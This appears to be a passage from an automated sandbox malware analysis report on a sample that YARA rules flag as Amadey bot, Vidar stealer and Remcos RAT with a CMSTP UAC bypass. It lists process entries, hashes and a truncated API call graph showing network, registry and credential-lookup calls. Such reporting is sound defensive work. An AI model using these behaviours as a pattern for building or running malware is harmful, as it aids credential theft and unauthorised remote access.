                                                                                              • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000000.00000000.875302819.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Author: Joe Security
                                                                                              • Rule: Windows_Trojan_Amadey_7abb059b, Description: unknown, Source: 00000000.00000000.875302819.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Author: unknown
                                                                                              • Rule: JoeSecurity_Amadey, Description: Yara detected Amadey bot, Source: 00000000.00000003.1377024727.000000000152E000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                              • Rule: JoeSecurity_Amadey, Description: Yara detected Amadey bot, Source: 00000000.00000003.887098483.000000000150F000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                              • Rule: JoeSecurity_Amadey, Description: Yara detected Amadey bot, Source: 00000000.00000003.1025890323.000000000152E000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                              • Rule: JoeSecurity_Amadey, Description: Yara detected Amadey bot, Source: 00000000.00000002.1399167458.000000000152E000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                              • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000000.00000002.1399093303.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Author: Joe Security
                                                                                              • Rule: Windows_Trojan_Amadey_7abb059b, Description: unknown, Source: 00000000.00000002.1399093303.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Author: unknown
                                                                                              • Rule: JoeSecurity_Amadey, Description: Yara detected Amadey bot, Source: 00000000.00000002.1399167458.00000000014CA000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                              • Rule: JoeSecurity_Amadey, Description: Yara detected Amadey bot, Source: 00000000.00000003.1315748710.000000000152E000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                              • Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: 00000000.00000003.886566380.0000000007F7B000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                              • Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: 00000000.00000002.1399625088.0000000007F7B000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                              • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000000.00000002.1399333427.00000000040ED000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                              • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000000.00000002.1399333427.00000000040ED000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                              • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 00000000.00000002.1399333427.00000000040ED000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                                                                              Reputation:low
                                                                                              Has exited:false

                                                                                              Target ID:1
                                                                                              Start time:06:01:52
                                                                                              Start date:28/09/2023
                                                                                              Path:C:\Windows\SysWOW64\rundll32.exe
                                                                                              Wow64 process (32bit):true
                                                                                              Commandline:"C:\Windows\System32\rundll32.exe" C:\Users\user\AppData\Local\Temp\1000026011\svchost.dll, STDAPI Start(void)
                                                                                              Imagebase:0xa40000
                                                                                              File size:61'952 bytes
                                                                                              MD5 hash:D7CA562B0DB4F4DD0F03A89A1FDAD63D
                                                                                              Has elevated privileges:true
                                                                                              Has administrator privileges:true
                                                                                              Programmed in:C, C++ or other language
                                                                                              Reputation:low
                                                                                              Has exited:true

                                                                                              Target ID:2
                                                                                              Start time:06:01:54
                                                                                              Start date:28/09/2023
                                                                                              Path:C:\Users\user\Desktop\yaALNupJCH.exe
                                                                                              Wow64 process (32bit):true
                                                                                              Commandline:C:\Users\user\Desktop\yaALNupJCH.exe
                                                                                              Imagebase:0xcb0000
                                                                                              File size:224'256 bytes
                                                                                              MD5 hash:B2EE13E6988E57F6731C20DA3459C8DC
                                                                                              Has elevated privileges:true
                                                                                              Has administrator privileges:true
                                                                                              Programmed in:C, C++ or other language
                                                                                              Yara matches:
                                                                                              • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000002.00000002.1399184360.0000000000DC7000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                              • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000002.00000002.1399136242.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Author: Joe Security
                                                                                              • Rule: Windows_Trojan_Amadey_7abb059b, Description: unknown, Source: 00000002.00000002.1399136242.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Author: unknown
                                                                                              • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000002.00000000.882851946.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Author: Joe Security
                                                                                              • Rule: Windows_Trojan_Amadey_7abb059b, Description: unknown, Source: 00000002.00000000.882851946.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Author: unknown
                                                                                              • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000002.00000002.1399082122.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                              • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000002.00000002.1399082122.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                              • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 00000002.00000002.1399082122.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                                                                              • Rule: REMCOS_RAT_variants, Description: unknown, Source: 00000002.00000002.1399082122.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                                                                              • Rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM, Description: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003), Source: 00000002.00000002.1399082122.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen
                                                                                              Reputation:low
                                                                                              Has exited:false

                                                                                              Target ID:3
                                                                                              Start time:06:01:55
                                                                                              Start date:28/09/2023
                                                                                              Path:C:\Users\user\Desktop\yaALNupJCH.exe
                                                                                              Wow64 process (32bit):true
                                                                                              Commandline:C:\Users\user\Desktop\yaALNupJCH.exe
                                                                                              Imagebase:0xcb0000
                                                                                              File size:224'256 bytes
                                                                                              MD5 hash:B2EE13E6988E57F6731C20DA3459C8DC
                                                                                              Has elevated privileges:true
                                                                                              Has administrator privileges:true
                                                                                              Programmed in:C, C++ or other language
                                                                                              Yara matches:
                                                                                              • Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: 00000003.00000002.907271529.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                              • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000003.00000002.907305691.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Author: Joe Security
                                                                                              • Rule: Windows_Trojan_Amadey_7abb059b, Description: unknown, Source: 00000003.00000002.907305691.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Author: unknown
                                                                                              • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000003.00000000.886541366.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Author: Joe Security
                                                                                              • Rule: Windows_Trojan_Amadey_7abb059b, Description: unknown, Source: 00000003.00000000.886541366.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Author: unknown
                                                                                              Reputation:low
                                                                                              Has exited:true

                                                                                              Target ID:6
                                                                                              Start time:06:02:02
                                                                                              Start date:28/09/2023
                                                                                              Path:C:\Windows\SysWOW64\WerFault.exe
                                                                                              Wow64 process (32bit):true
                                                                                              Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 7592 -s 2020
                                                                                              Imagebase:0x1070000
                                                                                              File size:434'592 bytes
                                                                                              MD5 hash:9E2B8ACAD48ECCA55C0230D63623661B
                                                                                              Has elevated privileges:true
                                                                                              Has administrator privileges:true
                                                                                              Programmed in:C, C++ or other language
                                                                                              Reputation:low
                                                                                              Has exited:true

                                                                                              Reset < >

                                                                                                Execution Graph

                                                                                                Execution Coverage:11.4%
                                                                                                Dynamic/Decrypted Code Coverage:0%
                                                                                                Signature Coverage:13.9%
                                                                                                Total number of Nodes:1131
                                                                                                Total number of Limit Nodes:35
                                                                                                execution_graph 24781 cc50e4 24782 cc5100 24781->24782 24783 cc50f2 24781->24783 24785 cc4ee0 __wsopen_s 37 API calls 24782->24785 24784 cc5156 57 API calls 24783->24784 24786 cc50fc 24784->24786 24787 cc511a 24785->24787 24788 cc4e40 __wsopen_s 17 API calls 24787->24788 24789 cc5127 24788->24789 24790 cc512e 24789->24790 24794 cc5156 24789->24794 24792 cc8951 _free 14 API calls 24790->24792 24793 cc5150 24790->24793 24792->24793 24795 cc5164 24794->24795 24796 cc5181 ___scrt_fastfail 24794->24796 24843 cc58ed 14 API calls __dosmaperr 24795->24843 24799 cc51a7 24796->24799 24800 cc51c3 CreateFileW 24796->24800 24798 cc5169 24801 cc5900 __dosmaperr 14 API calls 24798->24801 24845 cc58ed 14 API calls __dosmaperr 24799->24845 24803 cc51f5 24800->24803 24804 cc51e7 24800->24804 24805 cc5171 24801->24805 24847 cc5234 49 API calls __dosmaperr 24803->24847 24817 cc52be GetFileType 24804->24817 24844 cc6fd4 25 API calls __wsopen_s 24805->24844 24808 cc51ac 24811 cc5900 __dosmaperr 14 API calls 24808->24811 24810 cc517c 24810->24790 24812 cc51b3 24811->24812 24846 cc6fd4 25 API calls __wsopen_s 24812->24846 24813 cc51f0 ___scrt_fastfail 24815 cc51be 24813->24815 24816 cc5226 FindCloseChangeNotification 24813->24816 24815->24790 24816->24815 24818 cc52f9 24817->24818 24819 cc53ab 24817->24819 24820 cc5313 ___scrt_fastfail 24818->24820 24865 cc5634 21 API calls __dosmaperr 24818->24865 24821 cc53d7 24819->24821 24823 cc53b5 24819->24823 24825 cc5332 GetFileInformationByHandle 24820->24825 24834 cc53a2 24820->24834 24824 cc5401 PeekNamedPipe 24821->24824 24821->24834 24826 cc53c8 GetLastError 24823->24826 24827 cc53b9 24823->24827 24824->24834 24825->24826 24829 cc5348 24825->24829 24867 cc58ca 14 API calls __dosmaperr 24826->24867 24830 cc5900 __dosmaperr 14 API calls 24827->24830 24828 cc308c _ValidateLocalCookies 5 API calls 24832 cc542c 24828->24832 24848 cc5586 24829->24848 24830->24834 24832->24813 24834->24828 24838 cc542e 7 API calls 24839 cc5378 24838->24839 24840 cc542e 7 API calls 24839->24840 24841 cc538f 24840->24841 24866 cc5553 14 API calls __dosmaperr 24841->24866 24843->24798 24844->24810 24845->24808 24846->24815 24847->24813 24849 cc559c _wcsrchr 24848->24849 24852 cc5354 24849->24852 24868 cc9f53 38 API calls 2 library calls 24849->24868 24851 cc55e0 24851->24852 24869 cc9f53 38 API calls 2 library calls 24851->24869 24858 cc542e 24852->24858 24854 cc55f1 24854->24852 24870 cc9f53 38 API calls 2 library calls 24854->24870 24856 cc5602 24856->24852 24871 cc9f53 38 API calls 2 library calls 24856->24871 24859 cc5454 FileTimeToSystemTime 24858->24859 24860 cc5446 24858->24860 24861 cc5466 SystemTimeToTzSpecificLocalTime 24859->24861 24862 cc544c 24859->24862 24860->24859 24860->24862 24861->24862 24863 cc308c _ValidateLocalCookies 5 API calls 24862->24863 24864 cc5365 24863->24864 24864->24838 24865->24820 24866->24834 24867->24834 24868->24851 24869->24854 24870->24856 24871->24852 24581 cbb48e 24582 cbb490 GetFileAttributesA 24581->24582 24586 cbb4a0 24582->24586 24583 cbb562 24589 cc1350 27 API calls 24583->24589 24618 cbb675 24583->24618 24584 cbbc16 24585 cc6fe4 25 API calls 24584->24585 24588 cbbc1b 24585->24588 24586->24583 24586->24584 24587 cc1350 27 API calls 24590 cbb68e 24587->24590 24591 cc6fe4 25 API calls 24588->24591 24592 cbb583 24589->24592 24593 cb2b70 56 API calls 24590->24593 24594 cbbc20 24591->24594 24595 cb2b70 56 API calls 24592->24595 24596 cbb696 24593->24596 24597 cbbc25 24594->24597 24598 cc6fe4 25 API calls 24594->24598 24599 cbb58b 24595->24599 24600 cc1990 27 API calls 24596->24600 24601 cc6fe4 25 API calls 24597->24601 24598->24597 24762 cc1990 24599->24762 24603 cbb6a9 24600->24603 24604 cbbc2a 24601->24604 24606 cc1800 27 API calls 24603->24606 24610 cc1350 27 API calls 24604->24610 24605 cbb59e 24607 cc1800 27 API calls 24605->24607 24609 cbb6b6 GetFileAttributesA 24606->24609 24608 cbb5ab CreateDirectoryA 24607->24608 24616 cbb5c7 24608->24616 24621 cbb6cb 24609->24621 24613 cbbc4c 24610->24613 24772 cb5760 71 API calls 24613->24772 24615 cbbc57 24773 cb52a0 71 API calls 24615->24773 24616->24588 24616->24618 24618->24587 24619 cbbc67 24620 cc18f0 27 API calls 24619->24620 24625 cbbc74 24620->24625 24621->24594 24622 cbb78b 24621->24622 24623 cbbb29 24622->24623 24624 cbb79d 24622->24624 24626 cc16c0 27 API calls 24623->24626 24627 cc1350 27 API calls 24624->24627 24628 cbbcab GetModuleFileNameA 24625->24628 24630 cbbca1 24625->24630 24633 cbc8b0 24625->24633 24688 cbb870 24626->24688 24629 cbb7ab 24627->24629 24631 cbbce3 24628->24631 24770 cb4900 42 API calls 24629->24770 24630->24628 24631->24631 24636 cc16c0 27 API calls 24631->24636 24634 cc6fe4 25 API calls 24633->24634 24637 cbc8b5 24634->24637 24635 cbb7b3 24638 cc1350 27 API calls 24635->24638 24639 cbbcff 24636->24639 24641 cc6fe4 25 API calls 24637->24641 24642 cbb7c6 24638->24642 24643 cc1350 27 API calls 24639->24643 24640 cbbb24 24645 cbc8ba 24641->24645 24646 cb2b70 56 API calls 24642->24646 24644 cbbd0d 24643->24644 24647 cc1350 27 API calls 24644->24647 24778 cc23aa 27 API calls 2 library calls 24645->24778 24649 cbb7d1 24646->24649 24650 cbbd1b 24647->24650 24652 cc1990 27 API calls 24649->24652 24653 cb78f0 25 API calls 24650->24653 24651 cbc8c4 24654 cc6fe4 25 API calls 24651->24654 24655 cbb7e4 24652->24655 24656 cbbd20 24653->24656 24761 cbc10e 24654->24761 24657 cc1800 27 API calls 24655->24657 24658 cc4c7c 28 API calls 24656->24658 24660 cbb7f1 24657->24660 24662 cbbd36 24658->24662 24659 cc6fe4 25 API calls 24663 cbc8ce 24659->24663 24661 cc1800 27 API calls 24660->24661 24664 cbb7fe 24661->24664 24665 cbc618 24662->24665 24668 cc4d0a 67 API calls 24662->24668 24666 cc23ea 42 API calls 24663->24666 24673 cbb812 24664->24673 24771 cc1d80 27 API calls 2 library calls 24664->24771 24667 cc1350 27 API calls 24665->24667 24705 cbc60c 24666->24705 24670 cbc62c 24667->24670 24671 cbbd47 24668->24671 24674 cb2b70 56 API calls 24670->24674 24675 cc1350 27 API calls 24671->24675 24672 cc6fe4 25 API calls 24676 cbc8dd 24672->24676 24678 cc18f0 27 API calls 24673->24678 24677 cbc633 24674->24677 24682 cbbd56 24675->24682 24679 cc1350 27 API calls 24677->24679 24678->24688 24680 cbc63f 24679->24680 24681 cc1350 27 API calls 24680->24681 24684 cbc64d 24681->24684 24682->24637 24685 cbbda7 24682->24685 24683 cc5900 __dosmaperr 14 API calls 24686 cbbdc8 24683->24686 24687 cc1350 27 API calls 24684->24687 24685->24683 24689 cc6dc0 40 API calls 24686->24689 24690 cbc65b 24687->24690 24688->24597 24688->24640 24691 cbbde7 24689->24691 24692 cc1350 27 API calls 24690->24692 24691->24645 24694 cbbdf3 24691->24694 24693 cbc669 24692->24693 24695 cbaf20 76 API calls 24693->24695 24694->24663 24694->24665 24696 cbbe04 24694->24696 24695->24705 24697 cc1350 27 API calls 24696->24697 24698 cbbe18 24697->24698 24699 cb2b70 56 API calls 24698->24699 24700 cbbe1f 24699->24700 24701 cc1350 27 API calls 24700->24701 24702 cbbe2b 24701->24702 24703 cc1350 27 API calls 24702->24703 24704 cbbe39 24703->24704 24706 cc1350 27 API calls 24704->24706 24705->24672 24708 cbc89f 24705->24708 24707 cbbe47 24706->24707 24709 cc1350 27 API calls 24707->24709 24710 cbbe55 24709->24710 24711 cbaf20 76 API calls 24710->24711 24712 cbbe5a 24711->24712 24774 cb52a0 71 API calls 24712->24774 24714 cbbe65 SetCurrentDirectoryA 24716 cbbe7c 24714->24716 24718 cbbe9e 24714->24718 24716->24651 24716->24718 24717 cc1350 27 API calls 24719 cbbeb7 24717->24719 24718->24717 24720 cb2b70 56 API calls 24719->24720 24721 cbbec2 24720->24721 24722 cc1350 27 API calls 24721->24722 24723 cbbedc 24722->24723 24724 cb2b70 56 API calls 24723->24724 24725 cbbee7 24724->24725 24726 cc18f0 27 API calls 24725->24726 24727 cbbef7 24726->24727 24728 cc1800 27 API calls 24727->24728 24729 cbbf07 24728->24729 24731 cbbf1b 24729->24731 24775 cc1d80 27 API calls 2 library calls 24729->24775 24732 cc1350 27 API calls 24731->24732 24733 cbbf81 24732->24733 24734 cb2b70 56 API calls 24733->24734 24735 cbbf8c 24734->24735 24736 cc18f0 27 API calls 24735->24736 24737 cbbfa5 24736->24737 24738 cc1800 27 API calls 24737->24738 24739 cbbfb5 24738->24739 24740 cc18f0 27 API calls 24739->24740 24741 cbbfc5 24740->24741 24743 cbbfd9 24741->24743 24776 cc1d80 27 API calls 2 library calls 24741->24776 24744 cc1350 27 API calls 24743->24744 24745 cbc03f 24744->24745 24746 cb2b70 56 API calls 24745->24746 24747 cbc047 24746->24747 24748 cc18f0 27 API calls 24747->24748 24749 cbc060 24748->24749 24750 cc1800 27 API calls 24749->24750 24751 cbc070 24750->24751 24752 cc18f0 27 API calls 24751->24752 24753 cbc080 24752->24753 24755 cbc094 24753->24755 24777 cc1d80 27 API calls 2 library calls 24753->24777 24756 cc1350 27 API calls 24755->24756 24757 cbc0f8 24756->24757 24758 cb2b70 56 API calls 24757->24758 24759 cbc103 24758->24759 24760 cc1800 27 API calls 24759->24760 24760->24761 24761->24659 24761->24705 24763 cc1ee0 27 API calls 24762->24763 24764 cc19c7 24763->24764 24766 cc19e2 24764->24766 24779 cc1d80 27 API calls 2 library calls 24764->24779 24769 cc1a36 24766->24769 24780 cc1d80 27 API calls 2 library calls 24766->24780 24768 cc1a71 24768->24605 24769->24605 24770->24635 24771->24673 24772->24615 24773->24619 24774->24714 24775->24731 24776->24743 24777->24755 24779->24766 24780->24768 22294 cb73eb 22295 cb7771 22294->22295 22296 cb73f5 22294->22296 22301 cb78be 22295->22301 22305 cb78db 22295->22305 22405 cc16c0 22295->22405 22296->22295 22298 cb73ff InternetOpenW InternetConnectA 22296->22298 22330 cc1350 22298->22330 22300 cb7465 22344 cb2b70 22300->22344 22303 cb746d HttpOpenRequestA 22308 cb7496 22303->22308 22307 cc6fe4 25 API calls 22305->22307 22306 cc1350 27 API calls 22309 cb74ee 22306->22309 22310 cb78e0 22307->22310 22308->22306 22311 cb78d1 22308->22311 22312 cb2b70 56 API calls 22309->22312 22418 cc6fe4 22311->22418 22314 cb74f6 22312->22314 22317 cc1350 27 API calls 22314->22317 22315 cb78d6 22315->22305 22316 cc6fe4 25 API calls 22315->22316 22316->22305 22318 cb7516 22317->22318 22319 cb2b70 56 API calls 22318->22319 22320 cb751e HttpSendRequestA 22319->22320 22323 cb7538 22320->22323 22321 cb75aa InternetReadFile 22322 cb7733 InternetCloseHandle InternetCloseHandle InternetCloseHandle 22321->22322 22327 cb75c9 22321->22327 22322->22295 22323->22315 22323->22321 22324 cb7730 22324->22322 22325 cc16c0 27 API calls 22325->22327 22327->22311 22327->22324 22327->22325 22328 cb7706 InternetReadFile 22327->22328 22329 cb76fc 22327->22329 22404 cc1d80 27 API calls 2 library calls 22327->22404 22328->22324 22328->22327 22329->22328 22331 cc1375 22330->22331 22332 cc137c 22331->22332 22333 cc13ce 22331->22333 22334 cc13af 22331->22334 22332->22300 22339 cc25ef 27 API calls 22333->22339 22342 cc13c3 __wsopen_s 22333->22342 22335 cc1404 22334->22335 22336 cc13b6 22334->22336 22437 cb2210 27 API calls 2 library calls 22335->22437 22423 cc25ef 22336->22423 22339->22342 22340 cc13bc 22341 cc6fe4 25 API calls 22340->22341 22340->22342 22343 cc140e 22341->22343 22342->22300 22454 cb2970 22344->22454 22350 cb2c62 22350->22303 22351 cb2bbc 22352 cc6fe4 25 API calls 22351->22352 22353 cb2c32 22351->22353 22352->22353 22353->22350 22354 cc6fe4 25 API calls 22353->22354 22355 cb2c7d ___scrt_fastfail 22354->22355 22356 cb2ca2 RegOpenKeyExA 22355->22356 22357 cb2ccb RegQueryValueExA 22356->22357 22358 cb2cef RegCloseKey 22356->22358 22357->22358 22359 cb2d12 22358->22359 22359->22359 22360 cc16c0 27 API calls 22359->22360 22362 cb2d2a 22360->22362 22361 cb2d92 22361->22303 22362->22361 22363 cc6fe4 25 API calls 22362->22363 22364 cb2da9 RegOpenKeyExA 22363->22364 22366 cb2e0d RegCloseKey 22364->22366 22367 cb2de3 RegSetValueExA 22364->22367 22368 cb2e1e 22366->22368 22367->22366 22369 cb2ec4 22368->22369 22370 cc6fe4 25 API calls 22368->22370 22369->22303 22371 cb2ed7 GetUserNameA LookupAccountNameA 22370->22371 22373 cb2f4b 22371->22373 22374 cc1350 27 API calls 22373->22374 22375 cb2f5c 22374->22375 22376 cb2b70 46 API calls 22375->22376 22377 cb2f64 22376->22377 22469 cb2120 44 API calls 22377->22469 22379 cb2f7e 22380 cb317e 22379->22380 22381 cc1350 27 API calls 22379->22381 22382 cc6fe4 25 API calls 22380->22382 22383 cb2fd9 22381->22383 22384 cb3183 22382->22384 22385 cb2b70 46 API calls 22383->22385 22386 cc6fe4 25 API calls 22384->22386 22387 cb2fe1 22385->22387 22400 cb3145 22386->22400 22470 cb2120 44 API calls 22387->22470 22388 cc6fe4 25 API calls 22389 cb318d 22388->22389 22391 cb303a GetSidSubAuthorityCount 22392 cb30dd 22391->22392 22403 cb3054 22391->22403 22395 cc16c0 27 API calls 22392->22395 22393 cc1350 27 API calls 22393->22403 22394 cb3000 22394->22384 22394->22391 22397 cb3111 22395->22397 22396 cb2b70 46 API calls 22396->22403 22398 cc16c0 27 API calls 22397->22398 22398->22400 22399 cb3078 GetSidSubAuthority 22471 cb2120 44 API calls 22399->22471 22400->22388 22402 cb316b 22400->22402 22402->22303 22403->22380 22403->22392 22403->22393 22403->22396 22403->22399 22404->22327 22407 cc16d6 22405->22407 22408 cc16fe 22405->22408 22406 cc17dc 22476 cb2210 27 API calls 2 library calls 22406->22476 22407->22295 22408->22406 22409 cc176b 22408->22409 22410 cc1746 22408->22410 22414 cc25ef 27 API calls 22409->22414 22416 cc1757 __wsopen_s 22409->22416 22410->22406 22413 cc25ef 27 API calls 22410->22413 22412 cc17e6 22413->22416 22414->22416 22415 cc6fe4 25 API calls 22415->22406 22416->22415 22417 cc17be 22416->22417 22417->22295 22477 cc6f70 25 API calls 2 library calls 22418->22477 22420 cc6ff3 22478 cc7001 IsProcessorFeaturePresent 22420->22478 22422 cc7000 22426 cc25f4 22423->22426 22425 cc260e 22425->22340 22426->22425 22428 cc2610 22426->22428 22438 cc7035 22426->22438 22447 cc704f EnterCriticalSection LeaveCriticalSection __dosmaperr 22426->22447 22429 cb2210 Concurrency::cancel_current_task 22428->22429 22430 cc261a 22428->22430 22445 cc3240 RaiseException 22429->22445 22448 cc3240 RaiseException 22430->22448 22432 cb222c 22446 cc31be 26 API calls ___std_exception_copy 22432->22446 22435 cc2cec 22436 cb2253 22436->22340 22437->22340 22443 cc8e3a __dosmaperr 22438->22443 22439 cc8e78 22450 cc5900 22439->22450 22441 cc8e63 RtlAllocateHeap 22442 cc8e76 22441->22442 22441->22443 22442->22426 22443->22439 22443->22441 22449 cc704f EnterCriticalSection LeaveCriticalSection __dosmaperr 22443->22449 22445->22432 22446->22436 22447->22426 22448->22435 22449->22443 22453 cc9399 14 API calls 2 library calls 22450->22453 22452 cc5905 22452->22442 22453->22452 22472 cc1230 27 API calls 2 library calls 22454->22472 22456 cb2984 22457 cb29f0 22456->22457 22473 cc1230 27 API calls 2 library calls 22457->22473 22459 cb2b44 22462 cb27e0 22459->22462 22461 cb2a0e 22461->22459 22474 cc50b0 40 API calls __fassign 22461->22474 22463 cb27fa 22462->22463 22466 cb281a 22462->22466 22464 cc16c0 27 API calls 22463->22464 22465 cb2811 22464->22465 22465->22351 22475 cc1230 27 API calls 2 library calls 22466->22475 22468 cb286e 22468->22351 22469->22379 22470->22394 22471->22403 22472->22456 22473->22461 22474->22461 22475->22468 22476->22412 22477->22420 22479 cc700d 22478->22479 22482 cc6e28 22479->22482 22483 cc6e44 ___scrt_fastfail 22482->22483 22484 cc6e70 IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 22483->22484 22485 cc6f41 ___scrt_fastfail 22484->22485 22488 cc308c 22485->22488 22487 cc6f5f GetCurrentProcess TerminateProcess 22487->22422 22489 cc3095 22488->22489 22490 cc3097 IsProcessorFeaturePresent 22488->22490 22489->22487 22492 cc30d9 22490->22492 22495 cc309d SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 22492->22495 22494 cc31bc 22494->22487 22495->22494 24388 cc87af 24393 cc8585 24388->24393 24391 cc87ee 24394 cc85a4 24393->24394 24395 cc85b7 24394->24395 24403 cc85cc 24394->24403 24396 cc5900 __dosmaperr 14 API calls 24395->24396 24397 cc85bc 24396->24397 24413 cc6fd4 25 API calls __wsopen_s 24397->24413 24399 cc85c7 24399->24391 24410 cce6a0 24399->24410 24400 cc5900 __dosmaperr 14 API calls 24401 cc879d 24400->24401 24417 cc6fd4 25 API calls __wsopen_s 24401->24417 24408 cc86ec 24403->24408 24414 ccdf2f 37 API calls 2 library calls 24403->24414 24405 cc873c 24405->24408 24415 ccdf2f 37 API calls 2 library calls 24405->24415 24407 cc875a 24407->24408 24416 ccdf2f 37 API calls 2 library calls 24407->24416 24408->24399 24408->24400 24418 cce065 24410->24418 24413->24399 24414->24405 24415->24407 24416->24408 24417->24399 24421 cce071 ___scrt_is_nonwritable_in_current_image 24418->24421 24419 cce078 24420 cc5900 __dosmaperr 14 API calls 24419->24420 24422 cce07d 24420->24422 24421->24419 24423 cce0a3 24421->24423 24438 cc6fd4 25 API calls __wsopen_s 24422->24438 24429 cce632 24423->24429 24428 cce087 24428->24391 24440 cc4ee0 24429->24440 24434 cce668 24436 cce0c7 24434->24436 24437 cc8951 _free 14 API calls 24434->24437 24439 cce0fa LeaveCriticalSection __wsopen_s 24436->24439 24437->24436 24438->24428 24439->24428 24441 cc4e5d __fassign 37 API calls 24440->24441 24442 cc4ef2 24441->24442 24443 cc4f04 24442->24443 24495 cc9686 5 API calls __wsopen_s 24442->24495 24445 cc4e40 24443->24445 24496 cc4d8e 24445->24496 24448 cce6c0 24520 cce40e 24448->24520 24451 cce70b 24537 cca27a 24451->24537 24452 cce6f2 24551 cc58ed 14 API calls __dosmaperr 24452->24551 24455 cce6f7 24459 cc5900 __dosmaperr 14 API calls 24455->24459 24457 cce719 24552 cc58ed 14 API calls __dosmaperr 24457->24552 24458 cce730 24550 cce379 CreateFileW 24458->24550 24485 cce704 24459->24485 24462 cce71e 24464 cc5900 __dosmaperr 14 API calls 24462->24464 24463 cce7e6 GetFileType 24466 cce838 24463->24466 24467 cce7f1 GetLastError 24463->24467 24464->24455 24465 cce7bb GetLastError 24554 cc58ca 14 API calls __dosmaperr 24465->24554 24556 cca1c5 15 API calls 2 library calls 24466->24556 24555 cc58ca 14 API calls __dosmaperr 24467->24555 24468 cce769 24468->24463 24468->24465 24553 cce379 CreateFileW 24468->24553 24472 cce7ff CloseHandle 24472->24455 24475 cce828 24472->24475 24474 cce7ae 24474->24463 24474->24465 24477 cc5900 __dosmaperr 14 API calls 24475->24477 24476 cce859 24482 cce8a5 24476->24482 24557 cce588 71 API calls 2 library calls 24476->24557 24478 cce82d 24477->24478 24478->24455 24481 cce8da 24483 cce8e8 24481->24483 24484 cce8ac 24481->24484 24482->24484 24559 cce126 71 API calls 2 library calls 24482->24559 24483->24485 24487 cce964 CloseHandle 24483->24487 24558 cc8aa4 28 API calls 2 library calls 24484->24558 24485->24434 24560 cce379 CreateFileW 24487->24560 24489 cce98f 24490 cce999 GetLastError 24489->24490 24494 cce8b3 24489->24494 24561 cc58ca 14 API calls __dosmaperr 24490->24561 24492 cce9a5 24562 cca38d 15 API calls 2 library calls 24492->24562 24494->24485 24495->24443 24497 cc4d9c 24496->24497 24498 cc4db6 24496->24498 24514 cc4f1f 14 API calls _free 24497->24514 24500 cc4ddc 24498->24500 24501 cc4dbd 24498->24501 24516 cc8e88 MultiByteToWideChar 24500->24516 24513 cc4da6 24501->24513 24515 cc4f39 15 API calls __wsopen_s 24501->24515 24504 cc4deb 24505 cc4df2 GetLastError 24504->24505 24507 cc4e18 24504->24507 24518 cc4f39 15 API calls __wsopen_s 24504->24518 24517 cc58ca 14 API calls __dosmaperr 24505->24517 24507->24513 24519 cc8e88 MultiByteToWideChar 24507->24519 24509 cc4dfe 24512 cc5900 __dosmaperr 14 API calls 24509->24512 24511 cc4e2f 24511->24505 24511->24513 24512->24513 24513->24434 24513->24448 24514->24513 24515->24513 24516->24504 24517->24509 24518->24507 24519->24511 24521 cce42f 24520->24521 24522 cce449 24520->24522 24521->24522 24524 cc5900 __dosmaperr 14 API calls 24521->24524 24563 cce39e 24522->24563 24525 cce43e 24524->24525 24570 cc6fd4 25 API calls __wsopen_s 24525->24570 24527 cce481 24528 cce4b0 24527->24528 24530 